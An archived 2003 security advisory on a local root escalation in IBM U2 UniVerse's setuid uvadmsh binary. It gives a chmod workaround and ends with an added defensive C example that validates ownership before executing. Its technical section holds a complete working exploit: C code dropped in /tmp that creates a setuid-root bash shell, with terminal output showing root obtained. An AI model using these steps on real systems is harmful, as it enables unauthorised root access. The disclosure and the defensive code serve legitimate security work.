packetstorm - Strategic Reconnaissance Team - PACKETSTORM:31368
History: Jul 17, 2003 - 12:00 a.m.

SRT2003-07-07-0833.txt

`Secure Network Operations, Inc. http://www.secnetops.com  
Strategic Reconnaissance Team [email protected]  
Team Lead Contact [email protected]  
  
  
Our Mission:  
************************************************************************  
Secure Network Operations offers expertise in Networking, Intrusion   
Detection Systems (IDS), Software Security Validation, and   
Corporate/Private Network Security. Our mission is to facilitate a   
secure and reliable Internet and inter-enterprise communications   
infrastructure through the products and services we offer.   
  
  
Quick Summary:  
************************************************************************  
Advisory Number : SRT2003-07-07-0833  
Product : IBM U2 UniVerse  
Version : Version <= 10.0.0.9 ?  
Vendor : http://ibm.com/software/data/u2/universe/  
Class : local  
Criticality : High (to UniVerse servers with local users)   
Operating System(s) : Only confirmed on Linux (other unix based?)  
  
  
High Level Explanation  
************************************************************************  
High Level Description : users with uvadm rights can take root  
What to do : chmod -s /usr/ibm/uv/bin/uvadmsh  
  
  
Technical Details  
************************************************************************  
Proof Of Concept Status : SNO does have PoC code for this issue.  
Low Level Description :   
  
UniVerse is an extended relational database designed for embedding in   
vertical applications. Its nested relational data model results in   
intuitive data modeling and fewer resulting tables. UniVerse provides   
data access, storage and management capabilities across Microsoft®  
Windows® NT, Linux and UNIX platforms.  
  
The creation and use of the Unix user 'uvadm' is optional for UniVerse.   
It is not required for the successful installation, configuration and  
administration of UniVerse. The intended use of uvadm is to allow a  
selected, specific non-root user to perform all aspects of UniVerse  
administration.  
  
The uvadmsh program compares the invoking user's name against the string  
"uvadm", which means that in order to exploit this issue you need to have  
access to the user uvadm.  
  
[kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp  
...  
strcmp("kf", "uvadm") = -1  
  
[uvadm@vegeta uvadm]$ id  
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)  
  
You will note that with the proper uid the binary begins looking for  
the command line option "-uv.install", whose argument is the path to a  
binary file to execute.  
  
[uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp  
...  
strcmp("uvadm", "uvadm") = 0  
strcmp("-uv.install", "-uv.install") = 0  
  
This condition is fairly easy to take advantage of as you can see here.   
  
[uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c  
main()  
{  
setuid(0);  
system("cc -o /tmp/owned /tmp/owned.c");  
system("chmod 4755 /tmp/owned");  
}  
  
[uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c  
[uvadm@vegeta uvadm]$ cat > /tmp/owned.c  
main()  
{  
setuid(0);  
system("/bin/bash");  
}  
  
[uvadm@vegeta uvadm]$ ls -al /tmp/owned  
ls: /tmp/owned: No such file or directory  
  
[uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp  
[uvadm@vegeta uvadm]$ ls -al /tmp/owned  
-rwsr-xr-x 1 root uvadm 11640 Jul 2 20:15 /tmp/owned  
  
[uvadm@vegeta uvadm]$ /tmp/owned  
[root@vegeta uvadm]# id  
uid=0(root) gid=503(uvadm) groups=503(uvadm)  
  
Patch or Workaround : chmod -s /usr/ibm/uv/bin/uvadmsh  
  
Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user  
to perform all of the uvadmsh functions.  
  
Vendor Status : The IBM U2 staff will have this issue resolved  
in a future release of IBM U2. Patches may also be supplied on a per  
client basis at IBM's discretion.  
  
Bugtraq URL : to be assigned  
  
------------------------------------------------------------------------  
This advisory was released by Secure Network Operations, Inc. as a matter  
of notification to help administrators protect their networks against  
the described vulnerability. Exploit source code is no longer released  
in our advisories. Contact [email protected] for information on how  
to obtain exploit information.  
  
  
`
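
The advisory shows a setuid-root helper running a program from a directory named on the command line. As an added example (not IBM's code and not part of the advisory), this is the kind of check such a helper could apply before executing the file; `open_trusted_program`, `owner_only` and the ownership policy are assumptions for illustration, and only the final directory and the file are validated, not the parent path.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper (illustration only): true when the object is owned by
 * `trusted` and neither group nor others can write to it. */
static int owner_only(const struct stat *st, uid_t trusted)
{
    return st->st_uid == trusted &&
           (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Open dir/name only if both could be modified by nobody but `trusted`.
 * Returns a file descriptor, or -1 when the program must not be run.
 * Checks are made with fstat() on open descriptors, so the objects that
 * were checked are the ones that get used; hand the descriptor to
 * fexecve() instead of re-resolving the path. */
int open_trusted_program(const char *dir, const char *name, uid_t trusted)
{
    struct stat st;
    int dfd, fd;

    /* O_NOFOLLOW rejects a symlink as the final path component. */
    dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    if (fstat(dfd, &st) != 0 || !owner_only(&st, trusted)) {
        close(dfd);   /* e.g. /tmp: writable by every local user */
        return -1;
    }
    fd = openat(dfd, name, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    close(dfd);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        !owner_only(&st, trusted)) {
        close(fd);
        return -1;
    }
    return fd;
}
```

A setuid-root caller would pass 0 as `trusted`, so a world-writable directory such as /tmp is refused regardless of what it contains.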